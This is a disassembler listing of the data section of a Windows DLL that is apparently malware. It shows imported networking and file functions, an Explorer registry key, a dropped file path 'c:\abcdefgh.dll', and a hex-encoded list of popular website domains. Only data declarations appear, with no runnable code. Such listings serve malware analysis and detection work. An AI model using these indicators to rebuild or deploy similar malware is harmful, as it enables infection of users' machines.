off_9BA8B1 dd offset loc_9B1CAC ; DATA XREF: sub_9B1F68-215A�r
align 4
aRegclosekey db 'RegCloseKey',0 ; DATA XREF: .text:off_9BA698�o
off_9BA8C4 dd offset loc_9B1408 ; DATA XREF: sub_9B0930-2D4�r
aGallery db 'Gallery',0 ; DATA XREF: .text:009BA230�o
off_9BA8D0 dd offset dword_9BF11C ; DATA XREF: .text:009AFBE9�r
dword_9BA8D4 dd 0FFFFFFFFh, 9AD6E4h, 9B0C64h ; DATA XREF: .text:off_9B87A8�o
off_9BA8E0 dd offset loc_9B036C ; DATA XREF: sub_9B63D8-8491�r
dword_9BA8E4 dd 63696C66h, 632E726Bh ; DATA XREF: .text:009B9B4C�o
db 6Fh, 6Dh, 0
off_9BA8EF dd offset loc_9AEE6C ; DATA XREF: sub_9B0930-2399�r
off_9BA8F3 dd offset loc_9AF3D0 ; DATA XREF: sub_9B2F1C-D37�r
align 4
dword_9BA8F8 dd 0 ; DATA XREF: .text:off_9B88F0�o
; .text:009B88F4�o ...
aGetwindowsdire db 'GetWindowsDirectoryA',0 ; DATA XREF: .text:off_9B97C1�o
off_9BA911 dd offset loc_9AD524 ; DATA XREF: sub_9B04A8+1A2B�r
align 4
aDefender_0 db 'Defender',0 ; DATA XREF: .text:009BA208�o
align 4
aInterlockedexc db 'InterlockedExchange',0 ; DATA XREF: .text:off_9BA68C�o
off_9BA938 dd offset loc_9B292C ; DATA XREF: sub_9B3408-7670�r
off_9BA93C dd offset loc_9AB9A8 ; DATA XREF: sub_9B037C+2F�r
off_9BA940 dd offset loc_9AF1CC ; DATA XREF: sub_9B1D80+BE�r
dword_9BA944 dd 7170616Dh, 74736575h, 6D6F632Eh, 0 ; DATA XREF: .text:009B9BB4�o
dword_9BA954 dd 0FFFFFFFFh, 9AF244h, 9ACE8Ch ; DATA XREF: .text:off_9B97BD�o
aDistribution db 'Distribution',0 ; DATA XREF: .text:009BA214�o
off_9BA96D dd offset dword_9BEC14 ; DATA XREF: sub_9B46CC-1AAB�r
off_9BA971 dd offset dword_9BA1B0 ; DATA XREF: sub_9B57B4+5�r
align 4
aSpeech db 'Speech',0 ; DATA XREF: .text:009BA308�o
off_9BA97F dd offset dword_9BEBFC ; DATA XREF: sub_9B174C-60D9�r
; sub_9B1B20-10EB�r ...
align 4
aShell_0 db 'Shell',0 ; DATA XREF: .text:009BA300�o
off_9BA98A dd offset loc_9B1700 ; DATA XREF: sub_9B161C-4CC5�r
off_9BA98E dd offset loc_9AB5A4 ; DATA XREF: sub_9B63D8-F0F�r
off_9BA992 dd offset dword_9B88BC ; DATA XREF: sub_9AF25C+5�r
align 4
dword_9BA998 dd 2D73652Ch, 713B5355h, 352E303Dh, 0 ; DATA XREF: .text:009BA494�o
dword_9BA9A8 dd 0FFFFFFFFh, 9ACCF8h, 9ADA20h ; DATA XREF: .text:off_9B920F�o
dword_9BA9B4 dd 62656D61h, 6A2E6F6Ch, 70h ; DATA XREF: .text:009B9AC0�o
aGlobalalloc db 'GlobalAlloc',0 ; DATA XREF: .text:off_9B8EA0�o
aReference db 'Reference',0 ; DATA XREF: .text:009BA2DC�o
align 4
dword_9BA9D8 dd 0FFFFFFFFh, 9AEFFCh, 9B5EF4h ; DATA XREF: .text:off_9B96DC�o
off_9BA9E4 dd offset dword_9B8C6C ; DATA XREF: sub_9B562C:loc_9B0ADC�r
aEntercriticals db 'EnterCriticalSection',0 ; DATA XREF: .text:off_9B8C20�o
off_9BA9FD dd offset loc_9B5A10 ; DATA XREF: sub_9AE860+F05�r
off_9BAA01 dd offset loc_9B4088 ; DATA XREF: sub_9B63D8-5020�r
off_9BAA05 dd offset loc_9B20A0 ; DATA XREF: .text:009AE66E�r
off_9BAA09 dd offset loc_9B183C ; DATA XREF: sub_9B649C-31F5�r
off_9BAA0D dd offset loc_9B4710 ; DATA XREF: sub_9ABD30+A067�r
align 4
dword_9BAA14 dd 0FFFFFFFFh, 9B3B00h, 9B27ECh ; DATA XREF: .text:off_9B9024�o
off_9BAA20 dd offset dword_9B9A00 ; DATA XREF: sub_9AEBB8+5�r
aInitializecrit db 'InitializeCriticalSection',0 ; DATA XREF: .text:off_9B87A0�o
off_9BAA3E dd offset loc_9B2340 ; DATA XREF: sub_9B3EFC-633E�r
align 4
dword_9BAA44 dd 6F676F70h, 6D6F632Eh ; DATA XREF: .text:009B9C28�o
db 0
off_9BAA4D dd offset sub_9B3E78 ; DATA XREF: sub_9B4CF4-4E22�r
align 4
dword_9BAA54 dd 6C707061h, 6F632E65h, 6Dh ; DATA XREF: .text:009B9AC8�o
dword_9BAA60 dd 63697263h, 6F666E69h, 6D6F632Eh ; DATA XREF: .text:009B9B0C�o
db 0
off_9BAA6D dd offset dword_9BBCF8 ; DATA XREF: sub_9AB574+9�r
; sub_9AB574+21�r ...
align 4
dword_9BAA74 dd 79616265h, 2E6F632Eh ; DATA XREF: .text:009B9B28�o
db 75h, 6Bh, 0
off_9BAA7F dd offset loc_9B21EC ; DATA XREF: sub_9B03E8-4403�r
off_9BAA83 dd offset aUrlmon ; DATA XREF: sub_9B0930-4117�r
; "URLMON"
align 4
aStudiverzeichn db 'studiverzeichnis.com',0 ; DATA XREF: .text:009B9C5C�o
off_9BAA9D dd offset loc_9AF4FC ; DATA XREF: sub_9AEC20+9D�r
off_9BAAA1 dd offset loc_9B0888 ; DATA XREF: sub_9AFC28-4484�r
off_9BAAA5 dd offset loc_9AB10C ; DATA XREF: sub_9B327C+14�r
off_9BAAA9 dd offset loc_9ADBC4 ; DATA XREF: sub_9AF25C-387D�r
align 10h
dword_9BAAB0 dd 0FFFFFFFFh, 9AF358h, 9AE5B4h ; DATA XREF: .text:off_9B92F8�o
dword_9BAABC dd 454D49h ; DATA XREF: .text:009BA244�o
off_9BAAC0 dd offset loc_9AB8CC ; DATA XREF: sub_9AF25C-33E0�r
off_9BAAC4 dd offset loc_9B2CB4 ; DATA XREF: sub_9B63D8-9AD8�r
off_9BAAC8 dd offset loc_9B32B0 ; DATA XREF: sub_9B4480-1BBD�r
dword_9BAACC dd 302E35h ; DATA XREF: .text:off_9B9A70�o
off_9BAAD0 dd offset loc_9AE76C ; DATA XREF: sub_9B562C-32CC�r
off_9BAAD4 dd offset loc_9B137C ; DATA XREF: sub_9AC250+9720�r
off_9BAAD8 dd offset dword_9B8C8C ; DATA XREF: sub_9AB7C0+5�r
off_9BAADC dd offset loc_9B1634 ; DATA XREF: sub_9AD97C-17E5�r
aGlobalization db 'Globalization',0 ; DATA XREF: .text:009BA238�o
align 10h
aVkontakte_ru db 'vkontakte.ru',0 ; DATA XREF: .text:009B9C9C�o
off_9BAAFD dd offset loc_9AF6C0 ; DATA XREF: sub_9B63D8-1526�r
off_9BAB01 dd offset loc_9B0324 ; DATA XREF: sub_9ACEE8-180C�r
align 4
dword_9BAB08 dd 64726F77h, 73657270h, 6F632E73h ; DATA XREF: .text:009B9CAC�o
db 6Dh, 0
off_9BAB16 dd offset loc_9B0CE8 ; DATA XREF: sub_9B0930+3F08�r
align 4
aJournal db 'Journal',0 ; DATA XREF: .text:009BA260�o
aRapidshare_c_0 db 'rapidshare.com',0 ; DATA XREF: .text:009B9C34�o
align 4
aMs_0 db 'MS',0 ; DATA XREF: .text:009BA290�o
align 4
aPatch db 'Patch',0 ; DATA XREF: .text:009BA2B4�o
off_9BAB3E dd offset dword_9B9E2C ; DATA XREF: sub_9B63D8+5�r
align 4
dword_9BAB44 dd 696B6977h, 69646570h, 726F2E61h ; DATA XREF: .text:009B9CA8�o
db 67h, 0
off_9BAB52 dd offset loc_9B434C ; DATA XREF: sub_9B04A8-3A66�r
off_9BAB56 dd offset loc_9B20C8 ; DATA XREF: sub_9B5FC0-5E9C�r
off_9BAB5A dd offset loc_9ABA00 ; DATA XREF: sub_9B161C+F0�r
align 10h
aProgram db 'Program',0 ; DATA XREF: .text:009BA2D4�o
off_9BAB68 dd offset aDeletefilea ; DATA XREF: sub_9B0930:loc_9B31F4�r
; "DeleteFileA"
byte_9BAB6C db 2Fh, 0 ; DATA XREF: .text:off_9B9270�o
off_9BAB6E dd offset loc_9AD6D0 ; DATA XREF: sub_9B3EFC-5FA1�r
align 4
dword_9BAB74 dd 2E716369h, 6D6F63h ; DATA XREF: .text:009B9B7C�o
off_9BAB7C dd offset aGetmodulefilen ; DATA XREF: sub_9B0930:loc_9AC0EC�r
; "GetModuleFileNameA"
off_9BAB80 dd offset loc_9AE04C ; DATA XREF: sub_9B1F68-51BD�r
off_9BAB84 dd offset aGetsockname ; DATA XREF: sub_9B0930:loc_9AC960�r
; "getsockname"
off_9BAB88 dd offset loc_9B6018 ; DATA XREF: sub_9AF25C-3645�r
off_9BAB8C dd offset dword_9BADAC ; DATA XREF: sub_9B3618+5�r
off_9BAB90 dd offset loc_9B2054 ; DATA XREF: sub_9B0930+42C1�r
off_9BAB94 dd offset dword_9BA47C ; DATA XREF: sub_9B03E8+5�r
off_9BAB98 dd offset loc_9B1CE8 ; DATA XREF: sub_9B0930+2FF8�r
dword_9BAB9C dd 0FFFFFFFFh, 9B5BDCh, 9ACDD0h ; DATA XREF: .text:off_9B99BD�o
off_9BABA8 dd offset loc_9B5CFC ; DATA XREF: sub_9ABA3C+33CC�r
off_9BABAC dd offset loc_9B2324 ; DATA XREF: sub_9ACEE8+1725�r
off_9BABB0 dd offset aCryptreleaseco ; DATA XREF: sub_9B0930:loc_9AB5D8�r
; "CryptReleaseContext"
aRegistered db 'Registered',0 ; DATA XREF: .text:009BA2E0�o
off_9BABBF dd offset loc_9B2558 ; DATA XREF: sub_9B4CF4+76D�r
align 4
dword_9BABC4 dd 0FFFFFFFFh, 9B4250h, 9B5AD0h ; DATA XREF: .text:off_9B8CFB�o
dword_9BABD0 dd 0FFFFFFFFh, 9B2928h, 9B42A0h ; DATA XREF: .text:off_9B9481�o
dword_9BABDC dd 352E35h ; DATA XREF: .text:009B9A78�o
aListen db 'listen',0 ; DATA XREF: .text:off_9BA880�o
off_9BABE7 dd offset loc_9B5928 ; DATA XREF: sub_9AC448+8�r
off_9BABEB dd offset dword_9B8808 ; DATA XREF: sub_9B1B20+5�r
align 10h
aPublish db 'Publish',0 ; DATA XREF: .text:009BA2D8�o
aXnxx_com db 'xnxx.com',0 ; DATA XREF: .text:009B9CB8�o
align 4
aSetfileattribu db 'SetFileAttributesA',0 ; DATA XREF: .text:off_9B9730�o
off_9BAC17 dd offset loc_9B2E90 ; DATA XREF: sub_9AD7A4+EC�r
align 4
dword_9BAC1C dd 686F6576h, 6D6F632Eh ; DATA XREF: .text:009B9C94�o
db 0
off_9BAC25 dd offset sub_9AF5E4 ; DATA XREF: sub_9B27D8-746D�r
off_9BAC29 dd offset loc_9AD8D8 ; DATA XREF: sub_9B5480-6AD5�r
off_9BAC2D dd offset dword_9BB030 ; DATA XREF: sub_9B3864+5�r
align 4
aPrefetch db 'Prefetch',0 ; DATA XREF: .text:009BA2CC�o
align 10h
aNing_com db 'ning.com',0 ; DATA XREF: .text:009B9C04�o
align 4
aGetprocaddress db 'GetProcAddress',0 ; DATA XREF: .text:off_9BA370�o
off_9BAC5B dd offset dword_9B8920 ; DATA XREF: sub_9B14CC+5�r
off_9BAC5F dd offset aCreatefilea ; DATA XREF: sub_9B0930:loc_9B2584�r
; "CreateFileA"
off_9BAC63 dd offset loc_9B1ABC ; DATA XREF: sub_9B1F68-2B4�r
off_9BAC67 dd offset loc_9AB16C ; DATA XREF: sub_9B3864-441F�r
align 4
aSoftware db 'Software',0 ; DATA XREF: .text:009BA304�o
off_9BAC75 dd offset loc_9AB768 ; DATA XREF: sub_9ACD20+1C�r
off_9BAC79 dd offset loc_9AFAE4 ; DATA XREF: sub_9B562C-8175�r
align 10h
aPconline_com_c db 'pconline.com.cn',0 ; DATA XREF: .text:009B9C18�o
off_9BAC90 dd offset loc_9AAE78 ; DATA XREF: sub_9B3A74+85�r
aSendto_0 db 'sendto',0 ; DATA XREF: .text:off_9BAD44�o
align 4
aD_tmp db '\%d.tmp',0 ; DATA XREF: .text:off_9B8E51�o
off_9BACA4 dd offset dword_9B95D8 ; DATA XREF: sub_9B2118+5�r
off_9BACA8 dd offset loc_9AE744 ; DATA XREF: sub_9B1D80+215F�r
dword_9BACAC dd 6F647574h, 6F632E75h ; DATA XREF: .text:009B9C84�o
db 6Dh, 0
off_9BACB6 dd offset loc_9B05F8 ; DATA XREF: sub_9B6370-4B4A�r
off_9BACBA dd offset loc_9B3B08 ; DATA XREF: .text:009B2ACE�r
align 10h
dword_9BACC0 dd 756B6173h, 6E2E6172h, 706A2E65h, 0 ; DATA XREF: .text:009B9C40�o
dword_9BACD0 dd 0FFFFFFFFh, 9B0C60h, 9B43A8h ; DATA XREF: .text:off_9BA0E0�o
off_9BACDC dd offset loc_9B04C0 ; DATA XREF: sub_9B43F4+4A�r
off_9BACE0 dd offset loc_9B2068 ; DATA XREF: sub_9B0930+5E2�r
off_9BACE4 dd offset loc_9ABC4C ; DATA XREF: sub_9B1B20+99�r
off_9BACE8 dd offset loc_9AC220 ; DATA XREF: sub_9B1D80-109F�r
off_9BACEC dd offset dword_9BCB98 ; DATA XREF: sub_9ACEE8+40B2�r
; .text:009B117E�r
dword_9BACF0 dd 6F746F66h, 2E676F6Ch, 74656Eh ; DATA XREF: .text:009B9B50�o
aGoogle db 'Google',0 ; DATA XREF: .text:009BA23C�o
align 4
dword_9BAD04 dd 0FFFFFFFFh, 9B4804h, 9B2718h ; DATA XREF: .text:off_9BA7A8�o
off_9BAD10 dd offset loc_9B2A28 ; DATA XREF: sub_9B63D8-A94�r
dword_9BAD14 dd 2E636262h, 752E6F63h, 6Bh ; DATA XREF: .text:009B9AE4�o
aUrlmon db 'URLMON',0 ; DATA XREF: .text:off_9BAA83�o
off_9BAD27 dd offset loc_9AFA4C ; DATA XREF: sub_9AD11C-17F4�r
align 4
off_9BAD2C dd offset byte_9B9370 ; DATA XREF: sub_9AB3B0+7190�r
dd offset byte_9B89D0
dd offset dword_9B9A84
dd offset dword_9BA61C
dd offset dword_9B8FEC
dd offset dword_9B91B8
off_9BAD44 dd offset aSendto_0 ; DATA XREF: sub_9B0930:loc_9B4B18�r
; "sendto"
off_9BAD48 dd offset loc_9B594C ; DATA XREF: sub_9AC250+4D1D�r
off_9BAD4C dd offset dword_9BA67C ; DATA XREF: sub_9ABA3C+5�r
aExplorer db 'Explorer',0 ; DATA XREF: .text:009BA224�o
off_9BAD59 dd offset loc_9B2C88 ; DATA XREF: sub_9B0930+2E9�r
off_9BAD5D dd offset aRecvfrom ; DATA XREF: sub_9B0930:loc_9AF818�r
; "recvfrom"
align 4
dword_9BAD64 dd 0FFFFFFFFh, 9B55F0h, 9AEFA0h ; DATA XREF: .text:off_9BA10B�o
off_9BAD70 dd offset aFindfirstfilea ; DATA XREF: sub_9B0930:loc_9B0CE8�r
; "FindFirstFileA"
dword_9BAD74 dd 646E6F63h, 2E746975h, 6D6F63h ; DATA XREF: .text:009B9B04�o
dword_9BAD80 dd 78656E76h, 73657270h, 656E2E73h ; DATA XREF: .text:009B9CA0�o
db 74h, 0
off_9BAD8E dd offset dword_9B9964 ; DATA XREF: sub_9B1134+5�r
off_9BAD92 dd offset dword_9BBCE0 ; DATA XREF: sub_9AB1A0:loc_9AAFF0�r
; sub_9AB040+8�r ...
align 4
dword_9BAD98 dd 79616265h, 65642Eh ; DATA XREF: .text:009B9B30�o
off_9BADA0 dd offset loc_9B0B54 ; DATA XREF: sub_9AF25C+60F0�r
off_9BADA4 dd offset loc_9AD454 ; DATA XREF: sub_9ADAC4+BFF�r
off_9BADA8 dd offset loc_9B4A90 ; DATA XREF: sub_9AE860+71C0�r
dword_9BADAC dd 0FFFFFFFFh, 9AFE84h, 9ADF78h ; DATA XREF: .text:off_9BAB8C�o
dword_9BADB8 dd 0FFFFFFFFh, 9B3E8Ch, 9AE470h ; DATA XREF: .text:off_9B922E�o
off_9BADC4 dd offset aInet_ntoa ; DATA XREF: sub_9B0930:loc_9AF2CC�r
; "inet_ntoa"
off_9BADC8 dd offset dword_9BEBDC ; DATA XREF: sub_9B36E8-6FA2�r
; sub_9B3A74-6728�r ...
off_9BADCC dd offset loc_9AE508 ; DATA XREF: sub_9B0930-2021�r
dword_9BADD0 dd 69617263h, 696C7367h, 6F2E7473h, 6772h ; DATA XREF: .text:009B9B08�o
dword_9BADE0 dd 0FFFFFFFFh, 9ADF34h, 9B10BCh ; DATA XREF: .text:off_9B94BB�o
off_9BADEC dd offset aGetversionexa ; DATA XREF: sub_9B0930:loc_9ABF58�r
; "GetVersionExA"
off_9BADF0 dd offset loc_9B42F0 ; DATA XREF: sub_9B5904-93AE�r
off_9BADF4 dd offset loc_9B028C ; DATA XREF: sub_9ABA3C+96B8�r
off_9BADF8 dd offset loc_9AF44C ; DATA XREF: sub_9B0930+28F0�r
aGlobalfree db 'GlobalFree',0 ; DATA XREF: .text:off_9B9220�o
align 4
aVirtualalloc db 'VirtualAlloc',0 ; DATA XREF: .text:off_9B92F0�o
align 4
aHttp1_0 db 'HTTP/1.0 ',0 ; DATA XREF: .text:off_9B9936�o
off_9BAE22 dd offset loc_9AF398 ; DATA XREF: sub_9B1A08-3077�r
off_9BAE26 dd offset dword_9B8C78 ; DATA XREF: sub_9B562C+53�r
align 4
dword_9BAE2C dd 6576696Ch, 6D6F632Eh, 0 ; DATA XREF: .text:009B9BA0�o
aSetevent db 'SetEvent',0 ; DATA XREF: .text:off_9B983C�o
off_9BAE41 dd offset loc_9ADF3C ; DATA XREF: sub_9B63D8+A7�r
align 4
dword_9BAE48 dd 64697678h, 2E736F65h, 6D6F63h ; DATA XREF: .text:009B9CBC�o
aIoctlsocket db 'ioctlsocket',0 ; DATA XREF: .text:off_9B89B4�o
aTianya_cn db 'tianya.cn',0 ; DATA XREF: .text:009B9C70�o
off_9BAE6A dd offset loc_9ABDD4 ; DATA XREF: sub_9B1F68-21DA�r
align 10h
dword_9BAE70 dd 0FFFFFFFFh, 9B0758h, 9B1D58h ; DATA XREF: .text:off_9B971B�o
dword_9BAE7C dd 63696C61h, 74692E65h, 0 ; DATA XREF: .text:009B9AB4�o
dword_9BAE88 dd 0FFFFFFFFh, 9ABAA0h, 9ACEACh ; DATA XREF: .text:off_9BA38C�o
aCreatedirector db 'CreateDirectoryA',0 ; DATA XREF: .text:off_9B9F20�o
off_9BAEA5 dd offset loc_9ACE7C ; DATA XREF: sub_9AFF64+3E94�r
align 4
aMovie db 'Movie',0 ; DATA XREF: .text:009BA28C�o
align 4
aInternettimeto db 'InternetTimeToSystemTime',0 ; DATA XREF: .text:off_9B8F89�o
off_9BAECD dd offset loc_9ACE64 ; DATA XREF: sub_9B36E8-4D66�r
off_9BAED1 dd offset loc_9AF300 ; DATA XREF: sub_9B63D8-873E�r
off_9BAED5 dd offset loc_9B0BC0 ; DATA XREF: sub_9ADAC4-73F�r
off_9BAED9 dd offset a_memicmp ; DATA XREF: sub_9B0930:loc_9B1F30�r
; "_memicmp"
align 10h
dword_9BAEE0 dd 0FFFFFFFFh, 9B30D8h, 9B23ECh ; DATA XREF: .text:off_9B93DB�o
dword_9BAEEC dd 6F626562h, 6D6F632Eh ; DATA XREF: .text:009B9AE8�o
db 0
off_9BAEF5 dd offset loc_9AB930 ; DATA XREF: sub_9ACEE8+3027�r
off_9BAEF9 dd offset loc_9AFCE8 ; DATA XREF: sub_9B1D80-3433�r
off_9BAEFD dd offset loc_9B34C8 ; DATA XREF: sub_9B57B4+48�r
align 4
dword_9BAF04 dd 302E37h ; DATA XREF: .text:009B9A80�o
aDebug db 'Debug',0 ; DATA XREF: .text:009BA204�o
off_9BAF0E dd offset loc_9AC4E8 ; DATA XREF: sub_9AF25C+6E08�r
off_9BAF12 dd offset dword_9B9994 ; DATA XREF: sub_9B3984+5�r
align 4
aGetfileversi_0 db 'GetFileVersionInfoA',0 ; DATA XREF: .text:off_9B91D4�o
off_9BAF2C dd offset loc_9B40F0 ; DATA XREF: sub_9B63D8-35DC�r
dword_9BAF30 dd 0FFFFFFFFh, 9AE998h, 9B5804h ; DATA XREF: .text:off_9B9121�o
off_9BAF3C dd offset loc_9B5B08 ; DATA XREF: sub_9B0930-D0E�r
dword_9BAF40 dd 0FFFFFFFFh, 9AF12Ch, 9B25D4h ; DATA XREF: .text:off_9B9771�o
aPlayer db 'Player',0 ; DATA XREF: .text:009BA2C4�o
off_9BAF53 dd offset dword_9BA870 ; DATA XREF: sub_9B2010+5�r
off_9BAF57 dd offset loc_9B02E4 ; DATA XREF: sub_9B3EFC-5BC0�r
off_9BAF5B dd offset loc_9AC4B0 ; DATA XREF: sub_9B0930-23F5�r
off_9BAF5F dd offset loc_9B5D24 ; DATA XREF: sub_9B0FD0+C85�r
off_9BAF63 dd offset loc_9AF9A8 ; DATA XREF: sub_9B1A08+2EE3�r
off_9BAF67 dd offset loc_9B188C ; DATA XREF: sub_9B0930-2575�r
align 4
dword_9BAF6C dd 0FFFFFFFFh, 9B1034h, 9ADF14h ; DATA XREF: .text:off_9B9EC4�o
dword_9BAF78 dd 69726576h, 2E6E6F7Ah, 74656Eh ; DATA XREF: .text:009B9C98�o
dword_9BAF84 dd 0FFFFFFFFh, 9AB648h, 9B166Ch ; DATA XREF: .text:off_9BA3F4�o
; void *Src
Src dd offset dword_9B8A1C ; DATA XREF: sub_9B3150-3090�r
aVisual db 'Visual',0 ; DATA XREF: .text:009BA32C�o
off_9BAF9B dd offset dword_9BCB78 ; DATA XREF: sub_9B227C-5757�r
; sub_9B2118-1B94�r ...
off_9BAF9F dd offset loc_9AC8A8 ; DATA XREF: sub_9AEC20+4449�r
off_9BAFA3 dd offset loc_9B2434 ; DATA XREF: sub_9B2160-1DA0�r
off_9BAFA7 dd offset aGetmodulehandl ; DATA XREF: sub_9B0930:loc_9B1BC0�r
; "GetModuleHandleA"
align 4
dword_9BAFAC dd 6167656Dh, 6F6C7075h, 632E6461h ; DATA XREF: .text:009B9BC4�o
db 6Fh, 6Dh, 0
off_9BAFBB dd offset loc_9AB8B0 ; DATA XREF: sub_9B1A08-635D�r
off_9BAFBF dd offset aTime ; DATA XREF: sub_9B0930:loc_9B0B64�r
; "time"
off_9BAFC3 dd offset loc_9B4BD0 ; DATA XREF: sub_9B0930+4757�r
align 4
aSelect db 'select',0 ; DATA XREF: .text:off_9B97E5�o
off_9BAFCF dd offset dword_9BA6C0 ; DATA XREF: sub_9B562C+5�r
align 4
dword_9BAFD4 dd 6F6F6F6Bh, 632E6172h ; DATA XREF: .text:009B9B94�o
db 6Fh, 6Dh, 0
off_9BAFDF dd offset dword_9B9580 ; DATA XREF: sub_9B2E04+5�r
off_9BAFE3 dd offset loc_9ABD60 ; DATA XREF: sub_9B3408-433B�r
align 4
aSystem_0 db 'System',0 ; DATA XREF: .text:009BA30C�o
align 10h
aThepiratebay_o db 'thepiratebay.org',0 ; DATA XREF: .text:009B9C6C�o
align 4
aDocuments db 'Documents',0 ; DATA XREF: .text:009BA218�o
off_9BB00E dd offset loc_9AC960 ; DATA XREF: sub_9B0930-2804�r
align 4
dword_9BB014 dd 2D73652Ch, 713B5345h, 352E303Dh ; DATA XREF: .text:009BA490�o
db 0
off_9BB021 dd offset dword_9B9364 ; DATA XREF: sub_9B36E8+5�r
off_9BB025 dd offset loc_9B4A80 ; DATA XREF: sub_9B63D8-51B4�r
off_9BB029 dd offset loc_9B393C ; DATA XREF: sub_9AC250+92E0�r
align 10h
dword_9BB030 dd 0FFFFFFFFh, 9AB024h, 9AE0D0h ; DATA XREF: .text:off_9BAC2D�o
off_9BB03C dd offset dword_9BA8F8 ; DATA XREF: sub_9B63D8-14EF�r
dd offset dword_9BA8F8
dd offset dword_9B89F4
off_9BB048 dd offset loc_9B0AC0 ; DATA XREF: sub_9B4610+50�r
off_9BB04C dd offset loc_9ABF58 ; DATA XREF: sub_9B0930+12C2�r
off_9BB050 dd offset loc_9AD20C ; DATA XREF: sub_9B1D80-4ACF�r
off_9BB054 dd offset sub_9B2E04 ; DATA XREF: sub_9B4950-5A2C�r
; sub_9B4950-1EC2�r ...
aSoftwareMicros db 'Software\Microsoft\Windows\CurrentVersion\Explorer',0
; DATA XREF: .text:off_9B94FC�o
off_9BB08B dd offset dword_9B898C ; DATA XREF: sub_9ABE84+5�r
align 10h
aAccept db 'accept',0 ; DATA XREF: .text:off_9B9224�o
off_9BB097 dd offset dword_9BA148 ; DATA XREF: sub_9AD3EC+5�r
off_9BB09B dd offset loc_9ADD4C ; DATA XREF: sub_9B1A08+3A44�r
align 10h
dd 8 dup(0)
aNmqflzhf db 'nmqflzhf',0 ; DATA XREF: sub_9A3C63+A6�o
; sub_9A3C63+15D�o ...
align 4
dword_9BB0CC dd 9A0000h ; DATA XREF: DllMain(x,x,x)+2C�o
; DllMain(x,x,x)+3C�w ...
dword_9BB0D0 dd 27000h ; DATA XREF: DllMain(x,x,x)+27�o
; DllMain(x,x,x)+47�w ...
align 8
; char FileName[]
FileName db 'c:\abcdefgh.dll',0 ; DATA XREF: sub_9A36CC+11�o
; sub_9A3715+99�o ...
dd 3Ch dup(0)
db 3 dup(0)
byte_9BB1DB db 0 ; DATA XREF: sub_9A3715+146�w
; sub_9A3C63+43�w
dword_9BB1DC dd 0CA3F246h ; DATA XREF: sub_9A3715+1C�r
; sub_9A394B+22�r ...
dd 41h dup(0)
dword_9BB2E4 dd 0 ; DATA XREF: fn+20�w sub_9A4977�w ...
dword_9BB2E8 dd 0 ; DATA XREF: sub_9A52FE+3�r
; sub_9A52FE+19�r ...
dword_9BB2EC dd 7FFA0000h ; DATA XREF: sub_9A535E+3�r
; sub_9A5B2E+10�o
dword_9BB2F0 dd 0 ; DATA XREF: sub_9A53E9+3�r
; sub_9A53E9+19�r ...
dword_9BB2F4 dd 0 ; DATA XREF: sub_9A54C1+3�r
; sub_9A54C1+19�r ...
dword_9BB2F8 dd 0 ; DATA XREF: sub_9A556B+3�r
; sub_9A556B+18�r ...
dword_9BB2FC dd 0 ; DATA XREF: .text:loc_9A5623�r
; .text:009A5639�r ...
dword_9BB300 dd 0 ; DATA XREF: sub_9A58BD:loc_9A58E5�r
; sub_9A5BCD+25�o
dword_9BB304 dd 0 ; DATA XREF: sub_9A58F0:loc_9A592E�r
; sub_9A5C69+10�o
dword_9BB308 dd 0 ; DATA XREF: sub_9A58BD+9�r
; sub_9A5BCD+D�w
align 10h
dword_9BB310 dd 273h dup(0) ; DATA XREF: sub_9A83C7+1F�o
; sub_9A857A+3F�o ...
dword_9BBCDC dd 0 ; DATA XREF: _CRT_INIT(x,x,x)+8�r
; _CRT_INIT(x,x,x)+10�w ...
dword_9BBCE0 dd 6 dup(0) ; DATA XREF: sub_9B4950-2002�o
; .text:off_9BAD92�o
dword_9BBCF8 dd 6 dup(0) ; DATA XREF: .text:off_9BAA6D�o
dword_9BBD10 dd 0 ; DATA XREF: sub_9AC6DC-BD8�w
; sub_9AC6DC:loc_9AC3D0�w ...
dword_9BBD14 dd 0 ; DATA XREF: sub_9AC6DC-BD3�w
; sub_9AC6DC-306�w ...
dword_9BBD18 dd 0 ; DATA XREF: sub_9AC6DC:loc_9ABAA4�r
; sub_9AC6DC+69D8�w ...
dword_9BBD1C dd 0 ; DATA XREF: sub_9AC6DC:loc_9AC3DE�r
; sub_9AC6DC+69DE�w ...
dword_9BBD20 dd 0 ; DATA XREF: sub_9AC6DC:loc_9ACC74�r
; sub_9AC6DC:loc_9AFC78�r ...
dword_9BBD24 dd 0 ; DATA XREF: sub_9AB574+1A�r
; sub_9AC6DC+59F�w ...
dword_9BBD28 dd 0 ; DATA XREF: sub_9AFF64-2411�r
; sub_9AEC20+65�r ...
dword_9BBD2C dd 0 ; DATA XREF: sub_9AEC20:loc_9AB70C�w
; sub_9AF25C-340F�w ...
dword_9BBD30 dd 0 ; DATA XREF: sub_9B174C-60F9�w
; sub_9AF25C:loc_9ABE44�w ...
dword_9BBD34 dd 42h dup(0) ; DATA XREF: sub_9B4CF4:loc_9B2CCC�o
; .text:off_9B91EC�o
dword_9BBE3C dd 0 ; DATA XREF: sub_9AF25C-33E6�w
; sub_9AF25C-2D53�w ...
dword_9BBE40 dd 6 dup(0) ; DATA XREF: sub_9AF960-352�o
; .text:off_9B8ED2�o
dword_9BBE58 dd 41h dup(0) ; DATA XREF: .text:off_9B97DD�o
dword_9BBF5C dd 6 dup(0) ; DATA XREF: .text:off_9BA623�o
dword_9BBF74 dd 0 ; DATA XREF: sub_9B4FD0-A0DA�w
; sub_9B4FD0-6306�r ...
dword_9BBF78 dd 0 ; DATA XREF: sub_9B4FD0-A0CC�w
; sub_9B4FD0-1378�r
dword_9BBF7C dd 0 ; DATA XREF: sub_9B4FD0-A0C2�w
; sub_9B4FD0-50F4�r
dword_9BBF80 dd 0 ; DATA XREF: sub_9B4FD0-A0B8�w
; sub_9B4FD0-6249�r
dword_9BBF84 dd 0 ; DATA XREF: sub_9B4FD0-A0AF�w
; sub_9B4FD0-3189�r
dword_9BBF88 dd 0 ; DATA XREF: sub_9B4FD0-A0A5�w
; sub_9B4FD0-8484�r
dword_9BBF8C dd 0 ; DATA XREF: sub_9B4FD0-A09C�w
; sub_9B4FD0-4535�r
dword_9BBF90 dd 0 ; DATA XREF: sub_9B4FD0-A092�w
; sub_9B4FD0-54C5�r
dword_9BBF94 dd 0 ; DATA XREF: sub_9B4FD0-A081�w
; sub_9B4610-611F�r
dword_9BBF98 dd 0 ; DATA XREF: sub_9B4FD0-A087�w
; sub_9AF030+1BC3�w ...
dword_9BBF9C dd 0 ; DATA XREF: sub_9B35A0-2B92�r
; sub_9B4FD0-1ED5�w ...
dword_9BBFA0 dd 0 ; DATA XREF: sub_9B4FD0-A07B�w
